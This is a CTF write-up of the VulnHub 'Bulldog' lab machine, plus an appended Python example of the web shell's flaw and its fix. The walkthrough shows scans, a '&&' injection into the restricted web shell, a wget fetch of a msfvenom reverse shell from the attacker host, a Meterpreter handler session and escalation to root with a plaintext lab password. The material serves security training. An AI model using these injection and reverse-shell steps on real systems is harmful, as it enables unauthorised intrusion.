Bulldog – VulnHub
In this CTF writeup I am going to give you a walkthrough of "Bulldog", a vulnerable machine designed for security enthusiasts to improve their vulnerability assessment and penetration testing skills.
You can download this machine from the VulnHub link provided.
1. Start with an Nmap service scan: nmap -sV 192.168.1.158
2. As we can see, port 23 is open. I tried telnet and netcat but had no luck; the banner shows that the port is answered by OpenSSH, not a telnet service.
root@kali:~# telnet 192.168.1.158 23
Trying 192.168.1.158...
Connected to 192.168.1.158.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.
Connection closed by foreign host.
3. Run dirb against the host; it finds a few directories.
root@kali:~# dirb http://192.168.1.158
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 22 04:29:57 2017
URL_BASE: http://192.168.1.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.158/ ----
==> DIRECTORY: http://192.168.1.158/admin/
==> DIRECTORY: http://192.168.1.158/dev/
+ http://192.168.1.158/robots.txt (CODE:200|SIZE:1071)
---- Entering directory: http://192.168.1.158/admin/ ----
==> DIRECTORY: http://192.168.1.158/admin/auth/
==> DIRECTORY: http://192.168.1.158/admin/login/
==> DIRECTORY: http://192.168.1.158/admin/logout/
---- Entering directory: http://192.168.1.158/dev/ ----
==> DIRECTORY: http://192.168.1.158/dev/shell/
---- Entering directory: http://192.168.1.158/admin/auth/ ----
==> DIRECTORY: http://192.168.1.158/admin/auth/group/
==> DIRECTORY: http://192.168.1.158/admin/auth/user/
---- Entering directory: http://192.168.1.158/admin/login/ ----
---- Entering directory: http://192.168.1.158/admin/logout/ ----
---- Entering directory: http://192.168.1.158/dev/shell/ ----
---- Entering directory: http://192.168.1.158/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
---- Entering directory: http://192.168.1.158/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
-----------------
END_TIME: Wed Nov 22 04:32:16 2017
DOWNLOADED: 32284 - FOUND: 1
4. Open the directories dirb found:
http://192.168.1.158/dev/
http://192.168.1.158/dev/shell/
http://192.168.1.158/admin/
On viewing page source of http://192.168.1.158/dev/ we got
5. We Googled these hashes and got the password for nick/bulldog.
6. Now log in to the admin page and open http://192.168.1.158/dev/shell/. The web shell only lets us run a limited set of commands, but you can do command injection using the && operator.
7. We will use wget to transfer a shell from Kali to the target machine.
Create a reverse shell in Python using msfvenom.
Transfer it through the web shell using wget: ls && wget http://192.168.1.6:3000/shell.py
Make sure you give shell.py execute permission.
Now set up a listener:
msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp_uuid
payload => python/meterpreter/reverse_tcp_uuid
msf exploit(handler) > set RHOST 192.168.1.158
RHOST => 192.168.1.158
msf exploit(handler) > set LPORT 7000
LPORT => 7000
msf exploit(handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.6:7000
[*] Starting the payload handler...
[*] Sending stage (40044 bytes) to 192.168.1.158
[*] Meterpreter session 1 opened (192.168.1.6:7000 -> 192.168.1.158:43296) at 2017-11-30 03:01:47 -0500
8. Now that we have a meterpreter session, we will transfer linux privchecker.
Go to
meterpreter > ls
Listing: /home/bulldogadmin/.hiddenadmindirectory
Take an interactive shell by typing shell in meterpreter.
9.
$ python -c 'import pty; pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/.hiddenAVDirectory$ sudo su -
sudo su -
Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
root@bulldog:~# id
id
uid=0(root) gid=0(root) groups=0(root)
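Why the && trick in step 6 works, and what the check should have looked like, as an added example (not from the original post and not Bulldog's actual source). It assumes the web shell validates only the first word and then hands the whole string to a shell; the allowlist contents and the names run_weak and run_hardened are hypothetical.

```python
import shlex
import subprocess

# Assumed allowlist; the real application's list is not shown in the writeup.
ALLOWED = {"ls", "echo", "pwd"}
DENIED = "command not allowed"


def run_weak(cmdline: str) -> str:
    """Weak pattern: only the first word is checked, then the full string
    goes to /bin/sh, which interprets &&, ;, |, $( ) and backticks."""
    parts = cmdline.split()
    if not parts or parts[0] not in ALLOWED:
        return DENIED
    return subprocess.run(cmdline, shell=True,
                          capture_output=True, text=True).stdout


def run_hardened(cmdline: str) -> str:
    """Hardened pattern: tokenise without a shell and exec the argv list
    directly, so '&&' can only ever be a literal argument."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes and similar
        return DENIED
    if not argv or argv[0] not in ALLOWED:
        return DENIED
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=5).stdout


if __name__ == "__main__":
    probe = "echo safe && echo INJECTED"   # constructed, harmless input
    print("weak    :", repr(run_weak(probe)))      # second command runs
    print("hardened:", repr(run_hardened(probe)))  # && is just text
```

Removing the shell closes the chaining issue only; each allowlisted program's arguments still need their own validation.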